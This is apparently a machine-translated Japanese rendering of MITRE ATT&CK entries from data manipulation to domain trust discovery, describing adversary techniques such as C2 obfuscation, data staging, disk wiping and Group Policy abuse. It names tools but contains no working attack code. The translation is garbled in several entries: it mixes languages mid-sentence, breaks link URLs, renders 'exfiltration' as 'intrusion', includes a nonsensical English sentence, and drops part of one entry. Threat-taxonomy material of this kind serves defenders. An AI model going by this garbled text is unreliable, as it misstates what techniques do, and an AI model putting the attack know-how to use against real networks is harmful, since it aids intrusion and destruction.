T1565.001 データを操作する。ストアド・データ・マニピュレーション Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) 保存されたデータを操作することで、敵対者はビジネスプロセス、組織の理解、意思決定に影響を与えようとする可能性があります。

保存されたデータには、Officeファイル、データベース、保存された電子メール、カスタムファイルフォーマットなど、さまざまなファイルフォーマットが含まれる可能性があります。改ざんの種類とその影響は、データの種類や敵対者の目的・目標によって異なります。複雑なシステムの場合、敵対者はシステムに関連する特別な専門知識や専用ソフトウェアへのアクセスを必要とする可能性がありますが、これらは通常、長期間の情報収集キャンペーンを通じて得られるものです。
126
T1565.002 データ・マニピュレーション。送信データの操作性 Adversaries may alter data on route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) 送信されたデータを操作することで、敵対者はビジネスプロセスや組織の理解、意思決定に影響を与えようとする可能性があります。

Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information.ネットワーク接続やシステムプロセス間での操作は、情報を傍受して変更するツールを展開する機会があれば可能です。修正の種類とその影響は、対象となる伝送メカニズムや敵対者の目標・目的によって異なります。複雑なシステムの場合、敵対者は特別な専門知識を必要とし、場合によってはシステムに関連する特殊なソフトウェアにアクセスする必要があります。
127
T1001 データの難読化 敵対者は、コマンド&コントロール トラフィックを難読化して、検知を困難にすることがあります。コマンド&コントロール(C2)通信は、内容の発見や解読を困難にし、通信を目立たなくしてコマンドを見られないようにするために隠蔽されます(ただし、必ずしも暗号化されている必要はありません)。これには、プロトコル・トラフィックにジャンク・データを追加したり、ステガノグラフィを使用したり、正規のプロトコルになりすましたりするなど、さまざまな方法が含まれます。 128
T1001.001 データの難読化。ジャンクデータ 敵対者は、検知を困難にするために、コマンド&コントロールに使用されるプロトコルにジャンクデータを追加することがあります。コマンド&コントロールに使用されるプロトコルにランダムまたは無意味なデータを追加することで、敵対者は、トラフィックを解読、デコード、またはその他の方法で分析するための些細な方法を防ぐことができます。例えば、データにジャンクな文字を付加/前置したり、重要な文字の間にジャンクな文字を書き込んだりすることが考えられます。 129
T1001.003 データの難読化。プロトコル・インパーソネーション 敵対者は、コマンド&コントロール活動を偽装し、解析作業を妨害するために、正規のプロトコルやWebサービスのトラフィックになりすますことがあります。

敵対者は、偽のSSL/TLSハンドシェイクを行い、後続のトラフィックがSSL/TLSで暗号化されているように見せかけ、一部のセキュリティツールを妨害したり、トラフィックが信頼できるエンティティに関連しているように見せかけたりすることがあります。
130
T1001.002 データの難読化。ステガノグラフィ 敵対者は、ステガノグラフィ技術を用いてコマンド&コントロール・トラフィックを隠し、検知を困難にすることがあります。ステガノグラフィ技術は、システム間で転送されるデジタルメッセージにデータを隠すために使用できます。この隠された情報は、侵害されたシステムのコマンドおよび制御に使用できます。場合によっては、画像ファイルや文書ファイルなど、ステガノグラフィを使って埋め込まれたファイルの受け渡しがコマンド&コントロールに利用されることもあります。 131
T1074 ステージングされたデータ 侵入者は、収集したデータを侵入前に中央の場所やディレクトリに保管することがあります。データは別々のファイルに保存したり、[Archive Collected Data](https://attack.mitre.org/techniques/T1560)のような手法で1つのファイルにまとめたりします。インタラクティブなコマンドシェルを使用し、[cmd](https://attack.mitre.org/software/S0106)やbash内の共通機能を使用してデータをステージングロケーションにコピーしてもよい。(引用:PWC Cloud Hopper April 2017)

クラウド環境では、敵対者は、流出前に特定のインスタンスや仮想マシン内にデータをステージングすることがある。A adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)

Adversaries may choose to stage data from a victim network in centralized location prior to Exfiltration to the C2 server made of connections number of their C2 server and better evade detection.
132
T1074.001 Data Staged:ローカルデータのステージング 侵入者は、収集したデータを、侵入前にローカルシステム上の中央の場所やディレクトリに保管することがあります。データは別々のファイルに保存したり、[Archive Collected Data](https://attack.mitre.org/techniques/T1560)のような手法で1つのファイルにまとめたりします。対話型コマンドシェルを使用し、[cmd](https://attack.mitre.org/software/S0106)やbashの一般的な機能を使用してデータをステージングロケーションにコピーすることができます。 133
T1074.002 データステージング。リモートデータステージング 侵入者は、複数のシステムから収集したデータを、侵入前に1つのシステムの中央の場所やディレクトリに保管することがあります。データは別々のファイルに保存されるか、[Archive Collected Data](https://attack.mitre.org/techniques/T1560)のような手法で1つのファイルにまとめられるかもしれません。インタラクティブなコマンドシェルを使用し、[cmd](https://attack.mitre.org/software/S0106)や bash の一般的な機能を使用してデータをステージングロケーションにコピーすることができます。

クラウド環境では、敵対者はデータを特定のインスタンスや仮想マシン内にステージングしてから侵入することができます。敵対者は、[Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002)して、そのインスタンス内にデータをステージングすることができます。(Citation: Mandiant M-Trends 2020)

侵入前に1つのシステム上でデータをステージングすることで、敵対者はC2サーバーへの接続数を最小限に抑え、検出を回避しやすくなります。
134
T1030 データ転送サイズの制限 敵対者は、ファイル全体ではなく固定サイズのチャンクでデータを流出させたり、パケットサイズを一定の閾値以下に制限したりすることがあります。この方法は、ネットワークのデータ転送量のしきい値の警告を回避するために使用できます。 135
T1530 クラウドストレージからのデータ オブジェクト

多くのクラウドサービスプロバイダーは、Amazon S3、Azure Storage、Google Cloud Storage などのオンラインデータストレージのソリューションを提供しています。これらのソリューションは、包括的なアプリケーションが存在しないという点で、他のストレージソリューション(SQLやElasticsearchなど)とは異なります。これらのソリューションからのデータは、クラウドプロバイダーのAPIを使って直接取得することができます。ソリューションプロバイダーは通常、エンドユーザーがシステムを設定する際に役立つセキュリティガイドを提供しています(引用:Amazon S3 Security, 2019)(引用:Microsoft Azure Storage Security, 2019)(引用:Google Cloud Storage Best Practices, 2019)

エンドユーザーによる設定ミスはよくある問題です。クラウドストレージのセキュリティが不適切で(典型的には、認証されていないユーザーによる公開アクセスや、すべてのユーザーによる過度に広い範囲のアクセスを意図せずに許可することで)、クレジットカード、個人識別情報、医療記録、その他の機密情報へのオープンアクセスを許してしまう事件が数多く発生しています。(引用:Trend Micro S3 Exposed PII, 2017)(引用:Wired Magecart S3 Buckets, 2019)(引用:HIPAA Journal S3 Breach, 2017) また、敵対者は、アクセス許可制御が行われているクラウドストレージオブジェクトにアクセスする方法として、ソースリポジトリやログなどで流出した認証情報を入手することがあります。
136
T1602 設定リポジトリのデータ 敵対者は、設定リポジトリから管理対象デバイスに関連するデータを収集することがあります。設定リポジトリは、管理システムがリモートシステム上のデータを設定、管理、制御するために使用されます。また、設定リポジトリは、デバイスのリモートアクセスや管理を容易にする場合もあります。

敵対者は、大量の機密システム管理データを収集するために、これらのリポジトリを標的にする可能性があります。設定リポジトリからのデータは、さまざまなプロトコルやソフトウェアによって公開される可能性があり、多種多様なデータを保存することができますが、その多くは敵対者の発見目的に合致する可能性があります。(引用:US-CERT-TA18-106A)(引用:US-CERT TA17-156A SNMP Abuse 2017年版)
137
T1602.002 コンフィグレーション・リポジトリからのデータ。ネットワークデバイスのコンフィグレーションダンプ 敵対者はネットワーク設定ファイルにアクセスして、デバイスやネットワークに関する機密データを収集することがあります。ネットワーク設定は、デバイスの動作を決定するパラメータを含むファイルです。デバイスは通常、動作中はメモリ内に設定のコピーを保存し、デバイスのリセット後にロードするために不揮発性ストレージに別の設定を保存します。

敵対者は、SNMP(Simple Network Management Protocol)やSMI(Smart Install)などの一般的な管理ツールやプロトコルを使用して、ネットワーク設定ファイルにアクセスすることができます。(引用:US-CERT TA18-106A Network Infrastructure Devices 2018)(引用:Cisco Blog Legacy Device Attacks)これらのツールを使用して、設定リポジトリから特定のデータを照会したり、後で分析するために設定をエクスポートするようにデバイスを設定したりすることができます。
138
T1602.001 コンフィグレーション・リポジトリからのデータ。SNMP(MIBダンプ

MIBは、SNMPを介してアクセス可能な変数情報をオブジェクト識別子(OID)の形式で格納する設定リポジトリです。各OIDは、読み取りまたは設定が可能な変数を識別し、これらの変数のリモート修正を通じて、設定変更などのアクティブな管理タスクを可能にします。SNMPにより、管理者は、システム情報、ハードウェアの説明、物理的な場所、ソフトウェアパッケージなど、システムに関する優れた洞察力を得ることができます(Citation:SANS Information Security Reading Room Securing SNMP Securing SNMP)。)また、MIBには、実行中の設定、ルーティングテーブル、インターフェースの詳細など、デバイスの運用情報が含まれている場合があります。

敵対者は、ネットワークマップの構築や将来の標的搾取を可能にするネットワーク情報を収集するために、SNMPクエリを使用してSNMP管理デバイスから直接MIBコンテンツを収集する場合があります。(引用:US-CERT-TA18-106A)(引用:Cisco Blog Legacy Device Attacks)
139
T1213 情報リポジトリのデータ 敵対者は、情報リポジトリを活用して貴重な情報を採掘することがあります。情報リポジトリは、通常、ユーザー間のコラボレーションや情報共有を促進するために、情報の保存を可能にするツールであり、敵対者がさらなる目的を達成するために役立つ可能性のあるさまざまなデータを保存したり、ターゲットの情報に直接アクセスしたりすることができます。

以下は、敵対者にとって潜在的な価値を持つ可能性があり、情報リポジトリ上にも存在する可能性がある情報の例を簡単に示したものです。

* 政策、手順、および標準
* 物理的/論理的ネットワーク図
* システムアーキテクチャ図
* 技術システム文書
* テスト/開発証明書
* 作業/プロジェクトスケジュール
* ソースコードスニペット
* ネットワーク共有およびその他の内部リソースへのリンク

リポジトリに格納される情報は、特定のインスタンスや環境に応じて異なる場合があります。特定の一般的な情報リポジトリには、[Sharepoint](https://attack.mitre.org/techniques/T1213/002)、[Confluence](https://attack.mitre.org/techniques/T1213/001)、およびSQL Serverなどのエンタープライズデータベースがあります。
140
T1213.001 情報リポジトリーからのデータConfluence
敵対者は、Confluence リポジトリを利用して貴重な情報を採掘することがあります。

* ポリシー、手順、標準
* 物理的/論理的ネットワーク図
* システムアーキテクチャ図
* 技術システム文書
* テスト/開発証明書
* 作業/プロジェクトスケジュール
* ソースコードスニペット
* ネットワーク共有やその他の内部リソースへのリンク
141
T1213.002 情報リポジトリのデータ。Sharepoint 敵対者は、SharePointのリポジトリを貴重な情報を採掘するためのソースとして活用する可能性があります。SharePointには、敵対者が内部ネットワークやシステムの構造や機能を知る上で有用な情報が含まれていることがよくあります。例えば、

* ポリシー、手順、および標準
* 物理的/論理的ネットワーク図
* システムアーキテクチャ図
* 技術システム文書
* テスト/開発クレデンシャル
* 作業/プロジェクトスケジュール
* ソースコードスニペット
* ネットワーク共有やその他の内部リソースへのリンク
142
T1005 ローカルシステムからのデータ

敵対者は、ファイルシステムと対話して情報を収集する機能を持つ[cmd](https://attack.mitre.org/software/S0106)などの[Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)を使用して、ファイルシステムのソースを検索することがあります。また、ローカルシステム上で[Automated Collection](https://attack.mitre.org/techniques/T1119)を使用する場合もあります。
143
T1039 ネットワーク共有ドライブのデータ 敵対者は、侵入したコンピュータのネットワーク共有を検索し、目的のファイルを見つけることがあります。機密データは、侵入前に現システムからアクセス可能な共有ネットワークドライブ(ホストの共有ディレクトリ、ネットワークファイルサーバなど)を介してリモートシステムから収集することができます。インタラクティブなコマンドシェルが使用されている可能性があり、[cmd](https://attack.mitre.org/software/S0106)内の一般的な機能が情報収集に使用される可能性があります。 144
T1025 リムーバブルメディアからのデータ 敵対者は、侵入したコンピュータに接続されたリムーバブルメディアを検索し、目的のファイルを見つけることがあります。機密データは、侵入前に、侵入したシステムに接続されているリムーバブルメディア(光ディスクドライブ、USBメモリなど)から収集することができます。インタラクティブなコマンドシェルが使用されている可能性があり、[cmd](https://attack.mitre.org/software/S0106)内の一般的な機能が情報収集に使用される可能性があります。

敵対者の中には、リムーバブルメディアに対して[Automated Collection](https://attack.mitre.org/techniques/T1119)を使用する者もいます。
145
T1491 ディファースメント 敵対者は、企業ネットワークの内部または外部で利用可能なビジュアルコンテンツを改ざんすることがあります。Defacement](https://attack.mitre.org/techniques/T1491)の理由には、メッセージの配信、脅迫、または侵入の功績を(おそらく虚偽の)主張することが含まれます。ユーザーに不快感を与えたり、付随するメッセージの遵守を迫るために、不快な画像や攻撃的な画像が[Defacement](https://attack.mitre.org/techniques/T1491)の一部として使用されることがあります。
146
T1491.002 ディファイスメント。外観の汚損 敵対者は、組織やユーザーにメッセージを伝えたり、脅迫したり、誤解を招いたりすることを目的として、組織の外部システムを改ざんすることがあります。外部に向けたWebサイトの改ざんは、政治的なメッセージを発信したり、プロパガンダを広めたりするために、敵対者やハッカー集団に狙われることがよくあります。(引用:FireEye Cyber Threats to Media Industries)(引用:Kevin Mandia Statement to US Senate Committee on Intelligence)(引用:Anonymous Hackers Deface Russian Govt Site) [外部への改ざん](https://attack.mitre.org/techniques/T1491/002)は、イベントを引き起こすきっかけとして、または組織や政府が行った行動への反応として利用されることがあります。同様に、ウェブサイトの改ざんは、[Drive-by Compromise](https://attack.mitre.org/techniques/T1189)のような将来の攻撃のための準備や前兆として使用されることもあります。(引用:Trend Micro Deep Dive Into Defacement) 147
T1491.001 ディファイスメントインターナルディファイスメント 敵対者は、ユーザーを脅したり誤解させたりするために、組織内部のシステムを改ざんすることがあります。これは、内部のウェブサイトを変更するという形で行われることもあれば、デスクトップの壁紙を交換するという形でユーザーのシステムに直接行われることもあります。(引用:Novetta Blockbuster) ユーザーに不快感を与えたり、付随するメッセージの遵守を迫ったりするために、「内部改ざん」(https://attack.mitre.org/techniques/T1491/001)の一環として、不快な画像や攻撃的な画像が使用されることがあります。システムを内部的に改ざんすることで敵対者の存在が明らかになるため、他の侵入目的が達成された後に行われることが多いのです。 148
T1140 ファイルや情報の難読化・復号化 敵対者は、侵入の成果物を分析から隠すために、[難読化されたファイルまたは情報](https://attack.mitre.org/techniques/T1027)を使用することがあります。その情報をどのように利用するかによって、その情報を解読したり、難読化したりするための別のメカニズムを必要とする場合があります。

証明書ファイルの中に隠されたリモートアクセスツールのポータブル実行ファイルをデコードするために[certutil](https://attack.mitre.org/software/S0160)を使用するのはその一例です。(引用:Malwarebytes Targeted Attack against Saudi Arabia) また、Windowsの<code>copy /b</code>コマンドを使用して、バイナリの断片を悪意のあるペイロードに再構成することもその一例です。(引用:Carbon Black Obfuscation Sept 2016)

[User Execution](https://attack.mitre.org/techniques/T1204)の一環として、難読化解除や復号化のために開くために、ユーザーのアクションが要求されることがあります。また、敵対者が提供したパスワードで保護された圧縮/暗号化ファイルを開くために、ユーザーにパスワードの入力を要求する場合もあります。(引用:Volexity PowerDuke 2016年11月)
149
T1610 コンテナの展開 敵対者は、実行を容易にするため、または防御を回避するために、環境にコンテナを展開することがあります。場合によっては、マルウェアを実行したりダウンロードしたりするプロセスなど、特定のイメージや配置に関連するプロセスを実行するために、敵対者が新しいコンテナを配置することがあります。

コンテナは、Dockerの<code>create</code>および<code>start</code> APIを介して、またはKubernetesダッシュボードやKubeflowなどのウェブアプリケーションを介してなど、さまざまな方法でデプロイすることができます。(引用:Docker Containers API)(引用:Kubernetes Dashboard)(引用:Kubeflow Pipelines) 敵対者は、検索された、または構築された悪意のあるイメージに基づいて、または実行時に悪意のあるペイロードをダウンロードして実行する良性のイメージに基づいて、コンテナをデプロイすることができます(引用:Aqua Build Images on Hosts)
150
T1587 能力の開発 敵対者は、ターゲット時に使用できる能力を構築することがあります。敵対者は、能力を購入したり、自由にダウンロードしたり、盗んだりするのではなく、独自の能力を社内で開発することがあります。これは、開発要件を特定し、マルウェア、エクスプロイト、自己署名証明書などのソリューションを構築するプロセスです。敵対者は、敵対者のライフサイクルのさまざまな段階を通じて、自分たちの活動をサポートするために能力を開発することがあります。(引用:Mandiant APT1)(引用:Kaspersky Sofacy)(引用:Bitdefender StrongPity June 2020)(引用:Talos Promethium June 2020)

正規の開発努力と同様に、能力の開発にはさまざまなスキルセットが必要になる場合があります。必要なスキルは社内にある場合もあれば、外部に委託しなければならない場合もあります。敵対者が要件の形成に役割を果たし、能力に対するある程度の独占権を維持するのであれば、請負業者の使用は敵対者の開発能力の延長と考えられる。
151
T1587.002 能力の開発コードサイニング証明書 敵対者は、自己署名付きのコード署名証明書を作成し、標的化の際に使用することがあります。コード署名とは、実行ファイルやスクリプトにデジタル署名を行い、ソフトウェアの作者を確認し、コードが改ざんされていないことを保証するプロセスです。コード署名は、開発者からのプログラムの信頼性と、プログラムが改ざんされていないことを保証するものである。(引用:Wikipedia Code Signing)ユーザーやセキュリティツールは、証明書の発行者や作者が誰かわからなくても、署名されたコードを署名されていないコードよりも信頼することができる。

[Code Signing](https://attack.mitre.org/techniques/T1553/002)に先立ち、敵対者は作戦に使用するために自己署名のコード署名証明書を作成することがある。
152
T1587.003 能力の開発。電子証明書 敵対者は、自己署名入りのSSL/TLS証明書を作成し、標的化の際に使用することができます。SSL/TLS 証明書は、信頼性を高めるために設計されています。証明書には、鍵に関する情報、証明書の所有者の身元に関する情報、証明書の内容が正しいことを確認したエンティティのデジタル署名が含まれています。署名が有効で、証明書を検証する人が署名者を信頼していれば、その所有者との通信にその鍵を使用できることがわかります。

敵対者は、自分で署名したSSL/TLS証明書を作成し、C2トラフィックの暗号化など、自分たちの活動を促進するために使用することができます(例:[非対称暗号](https://attack.mitre.org/techniques/T1573/002)と[Webプロトコル](https://attack.mitre.))。org/techniques/T1071/001))、さらには、信頼の根源に追加されると(すなわち[Install Root Certificate](https://attack.mitre.org/techniques/T1553/004))、[Man-in-the-Middle](https://attack.mitre.org/techniques/T1557)を可能にします。

電子証明書を作成した後、敵対者は、その証明書を自分の管理下にあるインフラにインストールすることができます([Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)を参照)。
153
T1587.004 能力の開発エクスプロイト 敵対者は、ターゲティングの際に利用できるエクスプロイトを開発することがあります。エクスプロイトとは、バグや脆弱性を利用して、コンピュータのハードウェアやソフトウェアに意図しない、あるいは予期しない動作を起こさせることです。敵対者は、オンラインでエクスプロイトを見つけて修正したり、エクスプロイト・ベンダーから購入したりするのではなく、独自のエクスプロイトを開発することがあります。(引用:NYTStuxnet)敵対者は、エクスプロイトの開発作業に集中するために、[Vulnerabilities](https://attack.mitre.org/techniques/T1588/006)で得た情報を使用することがあります。エクスプロイト開発プロセスの一環として、敵対者はファジングやパッチ分析などの手法でエクスプロイト可能な脆弱性を発見することがあります(引用:Irongeek Sims BSides 2017)

正規の開発努力と同様に、エクスプロイトの開発には異なるスキルセットが必要になる場合があります。必要なスキルは、社内にある場合もあれば、外部に委託する必要がある場合もあります。

敵対者は、敵対者のライフサイクルの様々な段階でエクスプロイトを使用する可能性があります(例:[Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)、[Exploitation for Client Execution](https://attack.))。mitre.org/techniques/T1203)、[Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)、[Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211)、[Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)、[Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210)、[Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)などがあります。)
154
T1587.001 能力を開発する。マルウェア 敵対者は、標的化の際に使用可能なマルウェアやマルウェア コンポーネントを開発することがあります。悪意のあるソフトウェアの開発には、ペイロード、ドロッパー、妥協後のツール、バックドア(バックドア・イメージを含む)、パッカー、C2プロトコルの開発、感染したリムーバブル・メディアの作成などが含まれます。敵対者は、自らの活動を支援するためにマルウェアを開発し、リモートマシンの制御を維持したり、防御を回避したり、侵害後の行動を実行したりするための手段を構築することがあります。(引用:Mandiant APT1)(引用:Kaspersky Sofacy)(引用:ActiveMalwareEnergy)(引用:FBI Flash FIN7 USB)

正規の開発作業と同様に、マルウェアの開発にはさまざまなスキルセットが必要となる場合があります。必要なスキルは、社内にある場合もあれば、外部に委託する必要がある場合もあります。

C2プロトコルの開発など、マルウェア開発の一部の側面では、敵対者が追加のインフラを入手する必要がある場合があります。例えば、C2のためにTwitterと通信するマルウェアを開発するには、[Webサービス]( https://attack.mitre.org/techniques/T1583/006)の利用が必要になる場合があります。(引用:FireEye APT29
155
T1006 ダイレクト・ボリューム・アクセス 敵対者は、ファイルのアクセス制御やファイルシステムの監視を回避するために、ボリュームに直接アクセスすることがあります。Windowsでは、プログラムが論理ボリュームに直接アクセスすることができます。直接アクセスできるプログラムは、ファイルシステムのデータ構造を分析することで、ドライブから直接ファイルを読み書きすることができます。この手法は、Windowsのファイルアクセス制御やファイルシステム監視ツールを回避することができます。(引用:Hakobyan 2009)

PowerShellでこれらのアクションを実行するNinjaCopyなどのユーティリティが存在します。(引用:Github PowerSploit Ninjacopy)
156
T1561 ディスクワイプ 敵対者は、特定のシステムやネットワーク上で大量にディスクの生データを消去したり、破損させたりして、システムやネットワークのリソースの利用を妨害することがあります。ディスクへの直接書き込みアクセスにより、敵対者はディスクデータの一部を上書きしようとします。敵対者は、ディスクデータの任意の部分を消去したり、マスターブートレコード(MBR)などのディスク構造を消去することを選択できます。

ネットワーク全体の可用性を阻害することを目的とした運用において、標的となる組織への影響を最大化するために、ディスクのワイプに使用されるマルウェアは、[Valid Accounts](https://attack.mitre.org/techniques/T1078)、[OS Credential Dumping](https://attack.mitre.org/techniques/T1003)、[SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002)などの追加的な技術を利用して、ネットワーク全体に伝播するワームのような機能を持つことがあります。(引用:Novetta Blockbuster Destructive Malware)
157
T1561.001 ディスクワイプディスクコンテンツワイプ

敵対者は、ストレージデバイスのコンテンツを部分的または完全に上書きして、ストレージインターフェースを介してデータを回復できないようにすることがあります。(引用: Novetta Blockbuster)(引用: Novetta Blockbuster Destructive Malware)(引用: DOJ Lazarus Sony 2018) 破壊的な意図を持つ敵対者は、特定のディスク構造やファイルを消去するのではなく、ディスクコンテンツの任意の部分を消去することがあります。ディスクコンテンツを消去するために、敵対者は、任意のサイズのディスク部分をランダムなデータで上書きするために、ハードディスクへの直接アクセスを獲得することがあります。(引用:Novetta Blockbuster Destructive Malware) 敵対者は、ディスクコンテンツに直接アクセスするために、[RawDisk](https://attack.mitre.org/software/S0364)のようなサードパーティのドライバを活用していることが確認されています。(引用:Novetta Blockbuster)(引用:Novetta Blockbuster Destructive Malware) この動作は、個々のファイルではなく、ディスクのセクションが消去されるため、[Data Destruction](https://attack.mitre.org/techniques/T1485)とは異なります。

ネットワーク全体の可用性を阻害することが目的の運用において、対象となる組織への影響を最大化するために、ディスクのコンテンツを消去するために使用されるマルウェアは、[Valid Accounts](https://attack.mitre.org/techniques/T1078)、[OS Credential Dumping](https://attack.mitre.org/techniques/T1003)、[SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002)などの追加的な技術を利用してネットワーク全体に伝播するワームのような機能を持つことがあります。(引用:Novetta Blockbuster Destructive Malware)
158
T1561.002 ディスクワイプディスク構造のワイプ

敵対者は、マスターブートレコード(MBR)やパーティションテーブルなどの構造にある重要なデータを上書きすることで、システムを起動できないようにしようとすることがあります。(引用:Symantec Shamoon 2012)(引用:FireEye Shamoon Nov 2016)(引用:Palo Alto Shamoon Nov 2016)(引用:Kaspersky StoneDrill 2017)(引用:Unit 42 Shamoon3 2018) ディスク構造体に含まれるデータには、オペレーティングシステムをロードするための初期実行コードや、ディスク上のファイルシステムのパーティションの位置が含まれている場合があります。これらの情報がないと、起動時にOSを読み込むことができず、コンピュータが利用できない状態になります。[ディスク構造のワイプ](https://attack.mitre.org/techniques/T1561/002)は、単独で実行されることもあれば、ディスクの全セクタがワイプされる場合には[ディスクコンテンツのワイプ](https://attack.mitre.org/techniques/T1561/001)と一緒に実行されることもあります。

ターゲットとなる組織への影響を最大化するために、ディスク構造の破壊を目的としたマルウェアは、[Valid Accounts](https://attack)のような他の技術を利用してネットワーク上に伝播するワームのような機能を持つことがあります。mitre.org/techniques/T1078)、[OS Credential Dumping](https://attack.mitre.org/techniques/T1003)、[SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002)などがあります。(引用元:Symantec Shamoon 2012)(引用元:FireEye Shamoon Nov 2016)(引用元:Palo Alto Shamoon Nov 2016)(引用元:Kaspersky StoneDrill 2017)
159
T1484 ドメインポリシーの変更 敵対者はドメインの設定を変更して、防御を回避したり、ドメイン環境での権限を拡大したりすることがあります。ドメインは、コンピュータリソース(コンピュータ、ユーザアカウントなど)がネットワーク上でどのように行動し、相互に作用するかを管理するための一元化された手段を提供するものです。ドメインのポリシーには、マルチドメイン/フォレスト環境でドメイン間に適用される構成設定も含まれます。ドメインの設定の変更には、ドメインのグループポリシーオブジェクト(GPO)の変更や、フェデレーションの信頼を含むドメインの信頼設定の変更が含まれる場合があります。

十分な権限があれば、敵対者はドメインのポリシー設定を変更することができます。ドメイン設定の設定は、Active Directory (AD)環境内の多くのやりとりを制御するため、この不正使用に起因する潜在的な攻撃は非常に多い。このような不正使用の例としては、ドメイン環境全体のコンピュータに悪意のある[Scheduled Task](https://attack.mitre.org/techniques/T1053/005)をプッシュするためにGPOを変更すること(引用:ADSecurity GPO Persistence 2016)(引用:Wald0 Guide to GPO)(引用:Harmj0y Abusing GPO Permissions)や、被害者のドメインリソースが後に受け入れることになるアクセストークンを制御できる、敵対者が制御するドメインを含むようにドメイン信頼を変更することなどがあります(引用:Wald0 Guide to GPO)(引用:Wald0 Guide to GPO)(引用:Harmj0y Abusing GPO Permissions)などがあります。Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) 敵対者は、AD環境内の設定を変更して、[Rogue Domain Controller](https://attack.mitre.org/techniques/T1207)を実装することもできます。

敵対者は、ドメインポリシーを一時的に変更して悪意のある行為を実行した後、疑わしい指標を取り除くために変更を元に戻すことがあります。
160
T1484.002 ドメインポリシーの変更。ドメイン・トラストの変更 敵対者は、防御を回避したり、特権を昇格させたりするために、新しいドメイントラストを追加したり、既存のドメイントラストのプロパティを変更したりすることがあります。ドメインがフェデレートされているかどうかなどのドメイントラストの詳細は、共有リソースにアクセスする目的でドメイン間に適用される認証および認可のプロパティを可能にします。(引用:Microsoft - Azure AD Federation) これらのトラストオブジェクトには、アカウント、クレデンシャル、およびサーバー、トークン、ドメインに適用されるその他の認証材料が含まれる場合があります。

ドメイントラストを操作することで、敵対者は、自分がコントロールするオブジェクトを追加するために設定を変更することで、特権を拡大したり防御を回避したりすることができます。例えば、これは[SAML トークン](https://attack.mitre.org/techniques/T1606/002)を偽造するために使用されるかもしれないが、新しい認証情報を偽造するために署名証明書を侵害する必要はない。代わりに、敵対者はドメイン信頼を操作して、自分の署名証明書を追加することができる。
161
T1484.001 ドメインポリシーの変更。グループポリシーの変更 敵対者は、グループポリシーオブジェクト(GPO)を変更して、ドメインの裁量的なアクセス制御の意図を覆し、通常はドメイン上の特権を拡大する意図を持っています。グループポリシーとは、Active Directory (AD)内のユーザーやコンピュータの設定を一元的に管理するためのものです。GPOは、グループポリシー設定のコンテナであり、所定のネットワークパス<code>\\\</code>内に格納されたファイルで構成されています。(引用:TechNet Group Policy Basics)(引用:ADSecurity GPO Persistence 2016)

ADの他のオブジェクトと同様に、GPOにもアクセス制御が関連付けられています。デフォルトでは、ドメイン内のすべてのユーザーアカウントは、GPOを読む権限を持っています。GPOのアクセス制御権限(書き込み権限など)をドメイン内の特定のユーザーやグループに委任することが可能です。

悪意のあるGPOの変更は、[スケジュールされたタスク/ジョブ](https://attack.mitre.org/techniques/T1053)、[ツールの無効化または変更](https://attack.mitre.org/techniques/T1562/001)、[イングレスツール転送](https://attack.mitre.org/techniques/T1105)、[アカウントの作成](https://attack.)など、他の多くの悪意のある動作を実装するために使用できます。mitre.org/techniques/T1136)、[Service Execution](https://attack.mitre.org/techniques/T1569/002)などがあります。(引用:ADSecurity GPO Persistence 2016)(引用:Wald0 Guide to GPOs)(引用:Harmj0y Abusing GPO Permissions)(引用:Mandiant M Trends 2016)(引用:Microsoft Hacking Team Breach)GPOはAD環境の非常に多くのユーザーやマシンの設定を制御できるため、このGPOの乱用に起因する潜在的な攻撃は非常に多くあります。(引用:Wald0 Guide to GPO)

例えば、<code>New-GPOImmediateTask</code>のような公開されているスクリプトを利用して、悪意のある[Scheduled Task/Job]の作成を自動化することができます(https://attack.mitre.org/techniques/T1053)を利用し、GPOの設定を変更することで、悪意のある[ScheduledTasks/Job]の作成を自動化することができます(ここでは、<code>&lt;GPO_PATH&gt;\MachinePreferences\ScheduledTasks\ScheduledTasks.xml</code>を変更します)。(Citation: Wald0 Guide to GPO)(Citation: Harmj0y Abusing GPO Permissions) 場合によっては、<code>&lt;GPO_PATH&gt;に設定されている SeEnableDelegationPrivilege のような特定のユーザー権限を変更し、その権限を取得することがあります。inf</code>, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)
162
T1482 ドメイン・トラスト・ディスカバリー 敵対者は、Windowsのマルチドメイン/フォレスト環境における横移動の機会を特定するために使用される可能性のあるドメイン信頼関係の情報を収集しようとする可能性がある。ドメイン信頼関係は、あるドメインが他のドメインの認証手続きに基づいてリソースへのアクセスを許可するメカニズムを提供します。(引用:Microsoft Trusts) ドメイン信頼関係により、信頼されているドメインのユーザーは、信頼しているドメインのリソースにアクセスすることができます。発見された情報は、敵対者が[SID-History Injection](https://attack.mitre.org/techniques/T1134/005)、[Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)、[Kerberoasting](https://attack.mitre.org/techniques/T1558/003)を行うのに役立つかもしれません。(引用:AdSecurity Forging Trust Tickets)(引用:Harmj0y Domain Trusts) ドメイントラストは、`DSEnumerateDomainTrusts()` Win32 APIコール、.NETメソッド、およびLDAPを使用して列挙することができます。(引用:Harmj0y Domain Trusts) Windowsユーティリティ[Nltest](https://attack.mitre.org/software/S0359)は、ドメイントラストを列挙するために敵対者によって使用されることが知られています。(引用:Microsoft Operation Wilysupply) 163
